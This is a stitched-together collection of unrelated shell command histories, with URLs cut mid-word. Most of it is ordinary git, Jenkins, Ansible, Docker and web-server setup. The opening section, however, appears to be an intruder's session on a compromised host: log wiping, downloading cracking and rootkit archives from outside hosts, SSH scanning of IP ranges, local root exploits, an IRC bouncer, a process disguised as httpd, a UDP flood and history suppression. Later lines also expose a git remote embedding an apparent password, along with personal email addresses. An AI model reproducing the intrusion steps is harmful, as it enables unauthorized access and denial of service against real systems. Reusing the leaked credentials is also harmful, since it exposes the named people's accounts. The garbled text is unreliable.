+ls -aux +cat .bash_logout +rm -rf * +ls -aux +rm -rf lastlog +ps -aux +kill 3303 +ps -aux +tar xzvf delu.tgz +rm -rf delu.tgz +ps -aux +export PATH=. +httpd +chmod +x * +w +uname -a +cat /proc/cpuinfo +w +last +cat .bash_history +cat .bash_history +ls -aux +cat .bash_profile +cat .bashhrc +cat .bashrc +wget delutz.go.ro/delu.tgz +exit +id +ls +exit +w +ls +ls +w +wgets.com/cocosel_01/linux-archives/riprk.tgz +rm -rf riprk.tgz +ls +wget www.smoker.go.ro/scan/crackscan.tgz +tar xzvf crackscan.tgz +tar xvf crackscan.tgz +ls +./assh +chmod +x * +w +ls +who +ls +chmod +x * +l;s +ls +./assh 62.221 +./assh 201.0 +./assh 61.64 +lsw +ls +./find +netstat -a +netstat +ls +cat /etc/issue +cat /etc/hosts +ls +cat /proc/cpuinfo +wgets.com/cocosel_01/linux-archives/local.tar.gz +tar xzvf local.tar.gz +./aVe +ls +chmod +x * +./aVe +./op +./own +ls +./root +./a +./debian +id +ls +./w00t +./gcc +ls +./exim.pl +ls +ls +make +gcc +wgets.com/cocosel_01/psybnc-emech-eggdrop/psyBNC2.3.tar +tar xzvf psyBNC2.3.tar +make +gcc +make + +ls +wgets.com/cocosel_01/psybnc-emech-eggdrop/psybnc.tgz +tar xzvf psybnc.tgz +ls +make +ls +mv httpd runtime +./runtime +ls +perl udp.pl +perl udp.pl 80 0 +ls +./climb3r/ +ls +ls -all +ls +./run +ls +./psybnc +make +ls +ls +perl udp.pl 80 0 +perl udp.pl 80 0 +ping +ping -s 65000 +ping -s 65000 +perl udp.pl 0 0 +ls +ls +ls +ls +./assh 194.213 +exit +ls +cat>new.txt +pwd +ssh +netstat +sudo yum install netstat +sudo yum -y install net-tools +netstat +netstat -r +netstat -g +netstat -i +netstat -v +netstat -w +netstat +netstat -a +netstat -at +netstat -au +netstat -l +netstat -lt +netstat -lu +netstat -lx +netstat -s +netstat -st +netstat -su +netstat -tp +netstat -r +netstat -i +netstat -ie +netstat -g +netstat -c +netstat --verbose +netstat -ap | grep http +sudo netstat -ap | grep http +netstat --statistics --raw +ls /etc/ +ls /etc/host +ls /etc/hostname +nano /etc/hostname +sudo yum -y install nano +grep Port /etc/ssh/sshd_config +sudo chmod a=rwx /etc/ssh/sshd_config +grep Port /etc/ssh/sshd_config +cat /var/log/secure | grep “Failed password for” +sudo cat /var/log/secure | grep “Failed password for” +sudo cat /var/log/secure | grep “Failed password” +touch new.txt +ll new.txt +chmod u=0 new.txt +chmod 0 new.txt +ll new.txt +chmod 077 new.txt +ll new.txt +chmod 707 new.txt +ll new.txt +chmod 770 new.txt +ll new.txt +chmod 764 new.txt +ll new.txt +ssh +ping +ssh "bash --noprofile --norc" +nano /etc/ssh/sshd_config +sudo sysdtemctl restart sshd +sudo systemctl restart sshd +ssh "bash --noprofile --norc" +nano /etc/ssh/sshd_config +ssh-keyid +ssh-keygen +ssh-copy-id -i /home/vagrant/.ssh/id_rsa.pub abhay.kathrotiya@ +sudo -u jenkins ssh-keygen +ls /etc/default/ +ls /etc +ls /jenkins +ls / +find "jenkins" +hostname -I +ls +ls +LS +ls +ls +ls +whereis jenkins +nano /usr/lib/jenkins +ls +sudo yum -y install git +git --version +sudo yum remove jenkins +sudo wget -O /etc/yum.repos.d/jenkins.repos-ci.org/redhat/jenkins.repo +sudo yum -y install wget +sudo wget -O /etc/yum.repos.d/jenkins.repos-ci.org/redhat/jenkins.repo +sudo rpm --imports-ci.org/redhat/jenkins-ci.org.key +sudo yum -y install jenkins +sudo yum install java +sudo yum install jenkins +jenkins --version +sudo yum install jenkins +curl --silent --locations-ci.org/redhat-stable/jenkins.repo | sudo tee /etc/yum.repos.d/jenkins.repo +sudo yum install jenkins +sudo systemctl start jenkins +systemctl status jenkins +sudo systemctl enable jenkins +java -version +echo $JAVA_HOME +whereis jrnkins +whereis jenkins +ll +ll +ls plugins/ +su jenkins +sudo su jenkins +pwd +ssh-keygen +ls -l +exit +logout +ls +ls +ls +rm test-jenkins/ +rmdir test-jenkins/ +rmdir -r test-jenkins/ +rmdir --help +rmdir -r test-jenkins/ +rm -r test-jenkins/ +ls +nano helloworld.sh +git status +git add . +git status +git commit -m "file update" +git push +git status +sudo rm -r test-jenkins/ +sudo rm -r test_jenkins/ +ls +git cloneshchudasama/test_jenkins.git +ls +ls +touch helloworld.sh +nano helloworld.sh +git status +git add . +git commit -m "file upload" +git push +sudo su +ls +git init +git add README.md +touch README.md +git add README.md +git commit -m "first commit" +git push -u origin master +git remote add origin git@github.com:nileshchudasama/demo_repo.git +git push -u origin master +ssh-keygen -t rsa -b 4096 -C "nileshchudasama@github.com" +eval $(ssh-agent -s) +ssh-add ~/.ssh/id_rsa +clip< ~/.ssh/id_rsa.pub +sudo yum install clip +cat ~/.ssh/id_rsa.pub +git remote add origin git@github.com:nileshchudasama/demo_repo.git +git push -u origin master +ls +git init demo_repo +git add new.txt +git commit -m "first commit" +git remote add origin git@github.com:nileshchudasama/demo_repo.git +git remote add master git@github.com:nileshchudasama/demo_repo.git +git push -u origin master +git push +git push -u master origin +git init demo_repo1 +git add new.txt +git commit -m "first commit" +ls demo_repo1/ +git add new.txt +ls demo_repo1/ +ls demo_repo/ +git add new.txt +git commit -m "first commit" +git remote add master git@github.com:nileshchudasama/demo_repo.git +mkdir tempo +git remote add origin git@github.com:nileshchudasama/tempo.git +git push -u origin master +git remote add originshchudasama/tempo.git +git push -u origin master +git remote add origin git@github.com:nileshchudasama/tempo.git +git remote add master git@github.com:nileshchudasama/tempo.git +git push -u origin master +mkdir temp +touch new.txt +git commit -m "first commit" +git add new.txt +git remote add origin git@github.com:nileshchudasama/tempo.git +git remote set-url origin git@github.com:nileshchudasama/tempo.git +git push -u origin master +clear +git init new_repo +git add new.txt +git commit -m "first commit" +git remote set-url origin git@github.com:nileshchudasama/new_repo.git +git push -u origin master +git remote add origin git@github.com:nileshchudasama/new_repo.git +git remote set-url origin git@github.com:nileshchudasama/new_repo.git +git push -u origin master +git push -u github master +git remote rm origin +git remote add origin git@github.com:nileshchudasama/new_repo.git +git push -u origin master +git remote set-url origin git@github.com:nileshchudasama/new_repo.git +git push -u origin master +git remote -v +git remote add originshchudasama:mahadev.111@github.com/nileshchudasama/new_repo.git +git remote rm origin +git remote add originshchudasama:mahadev.111@github.com/nileshchudasama/new_repo.git +git push -u origin master +git remote add originshchudasama/new_repo.git +git remote rm origin +git remote add originshchudasama/new_repo.git +git push -u origin master +git remote add origin git@github.com:nileshchudasama/new_repo.git +git remote rm origin +git remote add origin git@github.com:nileshchudasama/new_repo.git +git push -u origin master +git remote add originshchudasama/new_repo.git +git remote rm origin +git remote add originshchudasama/new_repo.git +git push -u origin master +git remote set-url originshchudasama/new_repo.git +git push -u origin master +clear +ls +sudo rmdir demo_repo demo_repo1 +sudo rmdir -r demo_repo demo_repo1 +sudo rm -r demo_repo demo_repo1 +sudo rm -r new_repo temp tempo +ls +clear +git init demorepo +git add new.txt +git commit -m "add repo" +git remote add origin git@github.com:nileshchudasama/demprepo.git +git remote rm origin +git remote add origin git@github.com:nileshchudasama/demprepo.git +git push -u origin master +git commit -m "add repo" +touch hello.txt +git commit -m "add repo" +git remote add origin git@github.com:nileshchudasama/demprepo.git +git remote rm origin +git remote add origin git@github.com:nileshchudasama/demprepo.git +git push -u origin master +git remote rm origin +git remote add origin git@github.com:nileshchudasama/demorepo.git +git remote add originshchudasama/demorepo.git +git remote rm origin +git remote add originshchudasama/demorepo.git +git push -u origin master +git add /home/vagrant/new.txt +git commit -m "add repo" +ls demorepo/ +git add README.md +ls demorepo/ +git commit -m "add repo" +git add hogmail.sh +git commit -m "add repo" +git remote add originshchudasama/demorepo.git +git remote rm origin +git remote add originshchudasama/demorepo.git +git push -u origin master +git remote rm origin +git remote add origin git@github.com:nileshchudasama/demorepo.git +git push -u origin master +git commit -m "add repo" +git add .bash_history +git commit -m "add repo" +git remote rm origin +git remote add origin git@github.com:nileshchudasama/demorepo.git +git push -u origin master +git push -u origin demorepo +sudo systemctl start jenkins +systemctl status jenkins +sudo systemctl enable jenkins +scp new.txt vagrant@ /home/vagrant/ +scp /home/vagrant/new.txt vagrant@ /home/vagrant/ +scp /home/vagrant/new.txt nilesh@ /home/vagrant/ +touch temp.txt +scp /home/vagrant/temp.txt nilesh@ /home/vagrant/ +sudo scp /home/vagrant/temp.txt nilesh@ /home/vagrant/ +sudo useradd nilesh +sudo passwd nilesh +sudo scp /home/vagrant/temp.txt nilesh@ /home/vagrant/ +hostname -I +ls +sudo scp /home/vagrant/temp.txt nilesh@ /home/vagrant/copy_file +scp /home/vagrant/temp.txt nilesh@ /home/vagrant/copy_file +scp /home/vagrant/temp.txt nilesh@ /home/vagrant/copy_file +scp /home/vagrant/temp.txt nilesh@ /home/vagrant/copy_file +scp temp.txt nilesh@ /home/vagrant/copy_file +ls +scp temp.txt nilesh@ +ls +scp temp.txt vagrant@ +logout +ls -lrt +echo "# docker-tomcat" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origin +git push -u origin master +ls -lrt +git configure user.name="rvmuralimohan" +git config user.name="rvmuralimohan" +git config user.name "rvmuralimohan" +git config user.email "mohanmurali.r@gmail.com" +get status +git status +echo "# docker-tomcat" >> README.md +git init +git add README.md +git commit -m "Readme file" +git remove add origin +git remote add origin +git push -u origin master +ls -lrt +unzip -c benefits.war +PuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTY +unzip -C benefits.war +ls -lrt +git add -A +git commit -m "benefit" +git push origin master +ls -lrt +git add pom.xml +git commit -m "pom.xml" +git push -u origin master +ls +ls -lrt +ls +ls -lrt +cat web.xml +ls +ls -lrt +view pom.xml +ls +ls -lrt +ls +ls -lrt +ls +ls -lrt +cat web.xml +vi web.xml +ls -lrt +git update +git update-ref +git WEB-INF/ +ls +git all -A +git add -A +git commit -m "web.xml" +git push -u origin master +ls +ls -lrt +vi pom.xml +git add pom.xml +git commit -m "update pom.xml" +git push -u origin master +vi pom.xml +git add pom.xml +git push -u origin master +git commit -m "update pom.xml" +git push -u origin master +ls -l /root/.jenkins/workspace/docker-testing/target/myweb-0.0.1.war +ls -lrt +vi Dockerfile +ls -lrlt +ls -lrt +git add Dockerfile +git commit -m "Dockerfile" +git push -u origin master +docker search tomcat +vi Dockerfile +git add Dockerfile +git commit -t "Docker file" +git commit -m "Docker file" +git push -u origin master +docker iamges +docker images +ls -lrt +ls +ls -lt +vi pom.xml +git add pom.xml +git commit -m "pom.xml" +git push -o origin master +git push -u origin master +ls +ls -lrt +git add -A +unset histfile +w +ls -a +who +ls -a +cat /proc/cpuinfo +uname -a +passwd +wget +clear +wget +ftp +scp +wget +clear +w +uname -a +w +who +cpanm --sudo Font::FreeType +cpanm --sudo Font::FreeType +cpanm --sudo Font::FreeType +cpanm --sudo Font::FreeType +cpanm --sudo Font::FreeType +cpanm --sudo Font::FreeType +which apachectl +which apache2ctl +apache2ctl restart +sudo apachectl restart +sudo port install php5 +apache2 +pear php5-pcntl php5-memcache php5-mysql php5-curl php5-soap php5-memcache php5-mysql php5-curl php5-sqlite php5-mbstring +sudo /opt/local/apache2/bin/apxs -a -e -n "php5" libphp5.so +which gems +gems -v +gem -v +sudo apachectl restart +mv /sandbox/sites/index.html index.php +mvim /opt/local/apache2/conf/httpd.conf +sudo mvim /opt/local/apache2/conf/httpd.conf +sudo mvim /opt/local/apache2/conf/httpd.conf +sudo apachectl restart +which apachectl +sudo apachectl restart +chmod 0644 sites/ +ls +chmod 700 sites +ls +ls +touch index.php +mvim . +chmod 755 sites/ +mysql -u root +mysql -u root +source ~/.profile +mysql -u root +pwd +mysql -u root +ls +mvim . +ls +sudo mvim php.ini +sudo apachectl restart +pwd +sudo apachectl restart +sudo mvim /opt/local/var/db/php5/mysql.ini +sudo mvim /opt/local/etc/php5/php.ini +sudo mvim . +which mysql +whereis mysql +sudo mvim php.ini +sudo apachectl restart +ps aux | grep mysql +php --ri sockets +ls +cp wp-config-sample.php wp-config.php +mvim . +mvim /sandbox/sites/ +git status +ls +git status +pwd +pwd +git pull origin master +pwd +pwd +nginx +sudo port search nginx +mkdir ~/lib/scripts +chmod u+x build_nginx.sh +chmod a+x build_nginx.sh +sudo ./build_nginx.sh +which ruby +which gem +gem --version +sudo gem install passenger +sudo passenger-install-nginx-module +rvm info +rvmsudo passenger-install-nginx-module +nginx +source +source ~/.profile; source ~/.bash_profile +nginx +source ~/.profile +sudo nginx +sudo mvim /opt/nginx/conf/nginx.conf +sudo mvim /opt/nginx/conf/nginx.conf +sudo nginx restart +sudo nginx +ps aux | grep nginx +which perl +perl --version +pwd +ls +ls +perl -w TypefaceJS.pm AdobeClean-Regular.otf +sudo port search FreeType +sudo port install freetype +perl -w TypefaceJS.pm AdobeClean-Regular.otf +perl -w TypefaceJS.pm AdobeClean-Regular.otf +perl -w TypefaceJS.pm AdobeClean-Regular.otf +freetype-config +which freetype-config +which freetype-config --ftversion +freetype-config --ftversion +freetype-config --version +freetype-config --cflags +man freetype-config +sudo port selfupdate +sudo port upgrade outdated +sudo port installed +sudo port -n upgrade --force freetype +sudo port -n upgrade --force freetype+universal +sudo port installed +sudo port installed +sudo port search freetype +open /opt/local/include/freetype2/ +ssh flyingoctopus +exit +screen -D -R +ssh nautilus +ssh mini.locla +ssh mini.local +freetype-config +which freetype-config +ls +cat macports.txt +exit +man zip +tar -cvzf motto.tar.gz motto-bicolorA.otf motto-bicolorB.otf motto.otf +ls +cp motto.tar.gz /Volumes/flyingoctopus.net\ -\ \(flyingoc\)/public_html/bin/ +pw +pwd +mvim ~/.vimrc +ls +chdiff droid_sans_mono_regular.typeface.js droid_sans_mono_regular.typefaceproblem.js +bzr +sudo port search bzr +git --version +git bzr +port search git bzr +sudo port install bzr +pwd +bzr +pwd +ls +ls +ls +rm -rf TypefaceJS-0.11 TypefaceJS-0.11.zip +bzr branch lp:typeface.js +ls +ls +ls +open . +ls +ls +perl convert_font.pl ../fonts/AdobeClean-Regular.otf +cat Font/TypefaceJS.pm +cpanm Font::FreeType +sudo cpanm Font::FreeType +sudo cpanm Font::FreeType +pwd +sudo port uninstall freetype +which freetype +whois freetype +freetype +cat ~/Desktop/macports.txt +cpanm --sudo Font::FreeType +pwd +mvim . +sudo port install freetype +pwd +ls +rm paulirish-html5-boilerplate-v0.9.5stripped-0-g76305bc.zip +cat web.config +ls +pwd +git status +git commit -a -m modifications and removed html5boilerplate.zip +git commit -a +git commit -a +mvim . +git commit -a +git commit -a +ls +mvim . +ls +git pull origin master +screen -D -R +screen -D -R +screen -D -R + +; +open ~/.vim +pwd +ls +ls +open +open . +pwd +git commit -a +git commit -a +a8 +vim /Users/vincent/.profile +ssh nautilus +ssh mini.local +ssh nautilus +ssh mini.local +which port +port +port +screen -D -R +screen -D -R +screen -D -R +screen -D -R +screen -D -R +pwd +screen -D -R +ssh nautilus +ssh nautlius +ssh nautilus +ssh nautilus +screen -D -R +ssh nautilus +ssh mini.local +f +ssh mini.local +ssh mini.local +screen -D -R +ssh mini.local +ls +open heatmap-v2/ +mvim /Applications/MAXON/CINEMA\ 4D\ R12/library/scripts/ +sudo mvim /Applications/MAXON/CINEMA\ 4D\ R12/library/scripts/ +ls +rm -rf three.js/ +ls +git clones@github.com/flyingoctopus/three.js.git +ls +chdiff +chdiff --local-scm export_to_three.js.py /Applications/MAXON/CINEMA\ 4D\ R12/library/scripts/export_to_three.js.py +chdiff export_to_three.js.py /Applications/MAXON/CINEMA\ 4D\ R12/library/scripts/export_to_three.js.py +git commit -a +git push origin master +git pull origin master +mvim . +ps aux | grep mongo +mongo +nginx +source ~/.profile +nginx +sudo nginx +mongo +ps aux | grep mongo +sudo mongod +sudo mongo +which mongo +sudo mongod start +sudo mongo start +mongo -h +launchctl list +mvim ~/.screenrc +ping www.google.ca +ssh nautilus +ssh nautilus +ssh flyingoctopus +/Users/vincent/.vim/bundle/scvim/bin/start_pipe ; exit; +ssh nautilus +/Users/vincent/.vim/bundle/scvim/bin/start_pipe ; exit; +/Users/vincent/.vim/bundle/scvim/bin/start_pipe ; exit; +ssh mini.local +screen -D -R +screen -D -R +source ~/.profile +nginx -h +nginx -s stop +sudo nginx -s stop +sudo nginx +mvim ~/.screenrc +ls +mongo start +mongod +sudo mongod +sudo mongod +pwd +ls +mkdir db +ls +sudo mongod +sudo mongod & +ls +sudo mvim /opt/nginx/conf/nginx.conf +sudo mvim /opt/nginx/conf/nginx.conf +cp /Users/vincent/Dropbox/Pictures/flyingoctopus_little.png /Volumes/flyingoctopus.net\ -\ \(flyingoc\)/www/bin/ +pwd +launchctl list +nginx +source ~/.profile +nginx +sudo nginx +ls +ls +ls +ls +mongostat +sudo launchctl load -w /Library/LaunchDaemons/org.mongodb.mongod.plist +sudo launchctl unload /Library/LaunchDaemons/org.mongodb.mongod.plist +sudo launchctl load -w /Library/LaunchDaemons/org.mongodb.mongod.plist +mongo +sudo sh -c 'echo "/usr/local/mongodb/bin" > /etc/paths.d/mongodb' +sudo launchctl unload /Library/LaunchDaemons/org.mongodb.mongod.plist +launchctl list +sudo nginx -s quit +sudo nginx -s quit +sudo nginx -s quit +sudo nginx +sudo nginx -s quit +sudo nginx +pwd +ps + pwd +rake metrics:all +ls +ls +pwd +git clone git.coverallcrew.com:repositories/adobe-max-website-2011.git +s +ls +pwd +ls +git pull origin master +ls +git pull origin master +pwd +git clone git.coverallcrew.com:repositories/adobe-max-website.git +git show git.coverallcrew.com:repositories/adobe-max-website.git +git ls-remote git.coverallcrew.com:repositories/adobe-max-website.git +git ls-remote git.coverallcrew.com:repositories/adobe-max-website-2011.git +gitx +ls +gitx +open . +ln -s /Volumes/data/sandbox/coverallcrew/adobe-max-website-2011/ /Volumes/data/sandbox/sites/adobe-max-website-2011 +sudo nginx -s stop +tail -f /opt/nginx/logs/* +mvim /opt/nginx/conf/nginx.conf +sudo mvim /opt/nginx/conf/nginx.conf +tail -f /opt/nginx/logs/* +tail -f /opt/nginx/logs/* +top +screen -D -R +ssh nautilus +ssh mini.local +screen -D -R +mvim /sandbox/sites/makerfairevancouver/ +open /sandbox/sites/makerfairevancouver/ +pwd +exit +exit +exit +port +pe +ssh mini.local +ssh mini.local +ssh mini.local +ssh mini.local +ssh nautilus +ssh nautilus +which zsh +screen -D -R +screen -D -R +screen -D -R +ssh mini.local +ssh mini.local +screen -D -R +screen -D -R +ssh octonode +ssh octonode +ssh octonode +ssh octonode +ssh octonode +ssh octonode +mvim ~/.ssh +ssh octonode +ssh nautilus +ssh nautilus +ssh nautilus +ssh octonode +ssh root@ +sudo mvim ~/.ssh +ssh root@ +ssh mini.local +ssh mini.local +ssh mini.local +ssh mini.local +ssh mini.local +ssh mini.local +ssh mini.local +ssh root@ +ssh root@ +ssh root@ +ssh octonode +ssh root@ +ssh vincent@ +ls +ls +ssh octonode_rsa.pub +ssh vincent@ +ssh octonode +ssh nautilus +ssh nautilus +ssh nautilus -L 8880:nautilus:445 -N +ssh nautilus +screen -D -R +screen -D -R +screen -D -R +screen -D -R +vim +which vim +vim ~/.bashrc +ls -allF +/usr/local/bin/vim +exit +:q +ls +ls -allF +ssh mini.local +ssh mini.local +;q +exit +ls +pwd +ls -allF +exit +zsh +exit +exit +ls +ls +screen -D -R +df -h +free -g +cat /proc/cpuinfo | grep processor +root@instance-1:/home/shams_khan22 +gcloud +git +pwd +git clones-course +ll +ll +ll +sh install_jenkins.sh +docker ps +cat +cat /var/jenkins_home/secrets/initialAdminPassword +docker logs jenkins -f +docker ps +history +docker logs jenkins -f +date +docker logs jenkins -f +hostory +history +cat home +cat /var/jenkins_home/secrets/initialAdminPassword +expres +express +pwd +ll +ll +ll +pwd +ll +ll +ll +git clones-docker +ll +ll +docker build -t jenkins-docker . +docker stop jenkins +ll /var/jenkins_home/ +docker run -d -p 8080:8080 -p 5000:5000 -v /var/jenkins_home:/var/jenkins_home -v /var/runn/docker.sock:/var/run/doker.sock --name jenkins -d jenkins-docker +docker run -d -p 8080:8080 -p 5000:5000 -v /var/jenkins_home:/var/jenkins_home -v /var/run/docker.sock:/var/run/doker.sock --name jenkins -d jenkins-docker +docker run -d -p 8080:8080 -p 5000:5000 -v /var/jenkins_home:/var/jenkins_home -v /var/run/docker.sock:/var/run/docker.sock --name jenkins -d jenkins-docker +docker rm jenkins +docker run -d -p 8080:8080 -p 5000:5000 -v /var/jenkins_home:/var/jenkins_home -v /var/run/docker.sock:/var/run/docker.sock --name jenkins -d jenkins-docker +docker ps +ls -alh /var/run/docker.sock +docker exec -it jenkins bash +docker pull shamsk22/docker-nodejs-app +docker run -p 3000:3000 -d --name my-nodejs shamsk22/docker-nodejs-app +docker ps +curl localhost 3000 +hostname +ls -l +mkdir leandro +ls -l +vim +ls -l +vim leandro +vi leandro +ls-l +mkdir leandro +ls +apt-get install vim +aptget install vim +apt-get install vi +vim leandro +ls-l +ls +apt-get install vi +./leandro +nano leandro +vim +ls -l +vim leandro +ls-l +ls +ls -l +sudo yum install -y ansible +ll +ssh-keygen +ll +cat id_rsa.pub +ssh +ll +vim hosts +sudo vim hosts +ansible all -m ping +sudo vim hosts +ansible all -m ping +sudo vim hosts +ansible all -m ping +sudo vim hosts +ll +pwd +ansible all -m ping +echo "# ansible" >> README.md +git init +sudo yum install -y git +git init +git add README.md +git commit -m "first commit" +git config --global user.email "yousefn13@hotmail.co.uk" +git config --global user.name "yousefafc" +git add README.md +git commit -m "first commit" +git remote add originsefafc/ansible.git +git push -u origin master +vim git.yml +git add git.yml +git commit -m "adding yaml file" +git push +ansible-play +ansible-playbook . +ansible-playbook git.yml +ll +jenkins.yml +vim jenkins.yml +vim git.yml +vim jenkins.yml +vim java.yml +ansible-playbook +ansible-playbook . +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim git.yml +vim java.yml +ansible-playbook java.yml +vim git.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml + +vim java.yml +ansible-playbook java.yml +vim java.yml +vim git.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim jenkins.yml +vim java.yml +vim jenkins.yml +vim java.yml +vim jenkins.yml +ansible-galaxy install geerlingguy.jenkins -p ./roles/ +ansible-playbook jenkins.yml +vim jenkins.yml +ansible-playbook jenkins.yml +vim jenkins.yml +ansible-playbook jenkins.yml +vim jenkins.yml +ansible-playbook jenkins.yml +vim jenkins.yml +ansible-playbook jenkins.yml +vim jenkins.yml +ansible-playbook jenkins.yml +vim jenkins.yml +ansible-playbook jenkins.yml +vim jenkins.yml +ansible-galaxy install git -p ./roles/ +ll +ll +mkdir git +mkdir tasks +vim main.yml +ansible-playbook jenkins.yml +vagrant init centos/7 +sudo yum install -y vagrant +vagrant init centos/7 +sudo vagrant init centos/7 +sudo yum install -y vagrant +vim Vagrantfile +rm Vagrantfile +LL +ll +vim jenkins.yml +ansible-playbook jenkins.yml +ssh @ +ssh +vim jenkins.yml +ansible-playbook jenkins.yml +ssh +vim jenkins.yml +ansible-playbook jenkins.yml +vim nexus.yml + +ansible-playbook jenkins.yml +vim nexus.yml +ansible-playbook nexus.yml +vim nexus.yml +ansible-playbook nexus.yml +ll +vim nexus.yml +mkdir nexus +git clonesen/ansible-nexus.git +ll +ll +ansible-playbook playbook.yml +vim playbook.yml +ansible-playbook playbook.yml +ssh +ll +ll +vim jenkins.yml +git clonesible-nexus.git +ll +rm -rf nexus +ll +git status +git add --all +git commit -m "second commit" +git push +ll + +vim java.yml +vim nexus.yml +vim java.yml +vim nexus.yml +ansible-playbook nexus.yml +vim nexus.yml +ansible-playbook nexus.yml +vim nexus.yml +vim java.yml +vim nexus.yml +ansible-playbook jenkins.yml +ansible-playbook java.yml +ansible-playbook nexus.yml +ssh +yum search docker +yum search python3-pip +yum search python3 +yum search pip +sudo yum install docker +ll +ansible-playbook nexus.yml +ansible-playbook java.yml +ansible-playbook nexus.yml +clear +ansible-playbook java.yml +sudo yum install python-pip +ansible-playbook nexus.yml +ssh +vim java.yml +ansible-playbook jenkins.yml +vim jenkins.yml +ansible-playbook jenkins.yml +vim jenkins.yml +ssh +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim git.yml +vim java.yml +vim git.yml +ansible-playbook java.yml +wq +vim git.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +vim java.yml +ansible-playbook java.yml +ansible-playbook java.retry +ansible-playbook java.yml +ansible-playbook jenkins.yml +ll +ansible-playbook nexus.yml +git add nexus.yml +git commit -m "nexus" +git push +vim nexus.yml +ls +ls +ls +ls +ls +ls +pwd +ls +ls +ls +chmod 777 js/ +ls +ls -al +chmod 777 ConnectDb.php +ls +ls +ls +ls +sudo apt-get update +sudo apt-get install python-software-properties python g++ make +sudo add-apt-repository ppa:chris-lea/node.js +sudo apt-get update +sudo apt-get install nodejs +ls +ls +ls +ls +ls +ls +ls +logout +npm install simplecrawler +ls +npm install node-fs +npm install mongojs +ls +pwd +ls +ls +mv movie-crawler.js ../ +ls +ls +mongo +ls +sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 7F0CEB10 +echo 'debs-distro.mongodb.org/repo/ubuntu-upstart dist 10gen' | sudo tee /etc/apt/sources.list.d/mongodb.list +sudo apt-get update +sudo apt-get install mongodb-10gen +nohup node movie-crawler.js > foo.out 2> foo.err < /dev/null & +mongo +nohup node movie-crawler.js > foo.out 2> foo.err < /dev/null & +ls +node movie-crawler.js +mongo +nohup node movie-crawler.js > foo.out 2> foo.err < /dev/null & +kill %1 +ls +pwd +ls +ls +ls +ls +ls +ls +mongo +nohup node movie-crawler.js > foo.out 2> foo.err < /dev/null & +mongo +ls +top +kill 7996 +kill 7952 +top +mongo +nohup node movie-crawler.js > foo.out 2> foo.err < /dev/null & +mongo +node movie-crawler.js +nano movie-crawler.js +nohup node movie-crawler.js > foo.out 2> foo.err < /dev/null & +mongo +node movie-crawler.js +nohup node movie-crawler.js > foo.out 2> foo.err < /dev/null & +mongo +nano movie-crawler.js +nohup node movie-crawler.js > foo.out 2> foo.err < /dev/null & +mongo +node movie-crawler.js +nano movie-crawler.js +nohup node movie-crawler.js > foo.out 2> foo.err < /dev/null & +mongo +exit +mongo +exit +mongo +ls +nano movie-crawler.js +exit +mongo +top +mongo +exit +ls +ls +ls +ls +mkdir python_modules +ls +exit +ls +ls +ls +ls +exit +ls +ls +apt-get update +sudo apt-get update +sudo apt-get install python3 +ls +ls +sudo python3.3 setup.py install +sudo python3 setup.py install +ls +python3.3 scraper.py +python3 scraper.py +top +ls +rm -r BS +ls +exit +ls +ls +ls +ls +ls +vi new.html.erb +vim new.html.erb +exit +exit +git config core.autocrlf true +restart +dir +dir +dir +git config core.autocrlf true +git config core.autocrlf true +git commit +git add assets/ +git add all +git config core.autocrlf true +git add assets +dir +git add config +git commit +cat +cat +cat /var/jenkins_home/secrets/initialAdminPassword +exit +node +npm +/usr/bin/nodejs +docker images +exit +node +npm +pwd +/usr/bin/nodejs -v +exir +exit +node +whereis node +ls -la /usr/bin/node +ls +ls -la +ls -la /usr/bin/nodejs +npm +whereis npm +which nodejs +ls -la /usr/bin/nodejs +exit +groovy +java +which java +java -version +$(readlink -f /usr/bin/javac | sed "s:/bin/javac::") +ls +git clean -d -f -x +/var/jenkins_home/ +ls +exit +w +ls -a +passwd +exit +ls +vim shippable.yml +clear +ls -l +mkdir -p tools/Regional; cd tools; curl -o Regional.tar.gz -Lsoft/Regional/archive/v1.0.2.tar.gz; tar xzf Regional.tar.gz -C Regional --strip-components=1 +mkdir -p build/tex; cd build/tex; python3 ../../tools/Regional/regional.py ../../example-projects/fractals/src/app/fractals/fractals.cpp +mkdir -p build/tex; cd build/tex; python ../../tools/Regional/regional.py ../../example-projects/fractals/src/app/fractals/fractals.cpp +ls 